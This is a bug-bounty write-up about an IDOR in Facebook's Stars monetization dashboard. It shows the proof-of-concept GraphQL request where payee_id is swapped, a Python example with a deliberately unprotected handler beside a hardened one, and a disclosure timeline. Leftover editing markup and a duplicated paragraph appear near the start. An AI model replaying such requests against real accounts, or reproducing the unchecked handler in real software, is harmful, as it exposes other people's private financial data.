Unauthorized access to Facebook creator’s professional dashboard

Gtm Mänôz
Mar 5, 2024


Just after returning home from BountyCon Singapore, I had to fly to India in mid-October 2022 for family reasons. While I was there, my personal Facebook account met the country-location eligibility criterion for Stars monetization.
</grep_replace>
<gr_replace lines="10" cat="clarify" orig="On the midnight">
At midnight on 30 Oct 2022, I applied for Stars monetization on my personal Facebook account so I could explore the monetization section of the professional dashboard. After just 30 minutes of exploring Stars monetization, I was able to view any Facebook creator’s estimated earnings, total stars received, and earnings restrictions imposed for violations of the monetization policies.

On the midnight of 30th Oct, 2022, I applied to star monetization for my personal Facebook account in order to explore the monetization section of the professional dashboard. Just after 30 minutes of exploring star monetization, I was able to view any Facebook creator’s estimated earnings, total stars received and earnings restriction due to violation of monetization policies.

Proof of concept

Request:

POST /graphql HTTP/2
Host: graph.facebook.com
-other headers-

client_doc_id=10537346114216466748965519952
{"params":{"is_on_load_actions_supported":true,"params":"{params:{\"server_params\":{\"subtype\":\"GTW\",\"payee_id\":\"pageID\",\"entrypoint\":\"MGMT_ADD_PAYOUT_NOTIFICATION\",\"client_extra\":{\"product_type\":\"stars\"},\"exit_destination\":\"deferred_onboarding_notifications\",\"hide_tabbar\":true},\"client_input_params\":{}},}","bloks_versioning_id":"Some_Value_1","app_id":"com.bloks.www.payout_onboarding"},"scale":"2","nt_context":{"styles_id":"Some_Value_2","using_white_navbar":true,"pixel_ratio":2,"is_push_on":true,"bloks_version":"Some_Value_3"}}

Here the parameter payee_id=pageID was vulnerable to IDOR: the server acted on whatever page ID the client supplied, which disclosed the estimated earnings, total stars received and earnings restrictions of other Facebook creators.
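As an added illustration (not Facebook’s code or the author’s), the handler below shows the missing object-level check that turns a client-supplied payee_id into an IDOR, beside the hardened version that ties the payee to the authenticated requester. The page IDs, admin mapping and payout figures are constructed, and the nested Bloks params blob is written as strict JSON so it parses.

```python
import json

# Constructed sample data (not Facebook's): which user administers which page, and
# the per-page payout figures that only that page's admins should ever see.
PAGE_ADMINS = {"page_1001": {"user_alice"}, "page_2002": {"user_bob"}}
PAYOUT_DATA = {
    "page_1001": {"estimated_earnings": 120.50, "total_stars": 2410, "restricted": False},
    "page_2002": {"estimated_earnings": 15.00, "total_stars": 300, "restricted": True},
}

# Constructed request body mirroring the shape in the post: the Bloks "params" field is
# a JSON string nested inside the outer JSON (written here as strict JSON so it parses).
INNER_PARAMS = {"params": {"server_params": {"subtype": "GTW", "payee_id": "page_2002",
                                             "client_extra": {"product_type": "stars"}},
                           "client_input_params": {}}}
SAMPLE_REQUEST = {"params": {"is_on_load_actions_supported": True,
                             "params": json.dumps(INNER_PARAMS),
                             "app_id": "com.bloks.www.payout_onboarding"}}


class Forbidden(Exception):
    """Raised when the requester does not administer the requested payee."""


def extract_payee_id(body: dict) -> str:
    """Decode the nested params string and return the client-supplied payee_id."""
    inner = json.loads(body["params"]["params"])
    return inner["params"]["server_params"]["payee_id"]


def can_view_payout(requester: str, payee_id: str) -> bool:
    """Object-level authorization: the requester must be an admin of the payee page."""
    return requester in PAGE_ADMINS.get(payee_id, set())


def payout_summary_vulnerable(requester: str, body: dict) -> dict:
    """IDOR: payee_id is taken from the request and never tied to the requester."""
    return PAYOUT_DATA[extract_payee_id(body)]


def payout_summary_fixed(requester: str, body: dict) -> dict:
    """Hardened: the same lookup, gated on the requester's relationship to the payee."""
    payee_id = extract_payee_id(body)
    if not can_view_payout(requester, payee_id):
        raise Forbidden(f"{requester} is not an admin of {payee_id}")
    return PAYOUT_DATA[payee_id]
```

The check belongs on the server side of every endpoint that takes an owner-style identifier; a denied request here is also a useful audit signal for repeated cross-page lookups from one account.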

Impact

Unauthorized access to any Facebook creator’s professional dashboard

Timeline

  • 30 Oct, 2022 — Report sent to Facebook.
  • 1 Nov, 2022 — Triaged.
  • 3 Nov, 2022 — Bounty awarded by Facebook.
  • 8 Nov, 2022 — Fixed.
  • 15 Dec, 2022 — Bypass sent.
  • 19 Dec, 2022 — Double bounty awarded by Facebook.
  • 30 Jan–25 Oct, 2023 — Asked for updates.
  • 25 Oct, 2023 — Got a reply that the issue had been mitigated during March, but I never received a fix message at that time.
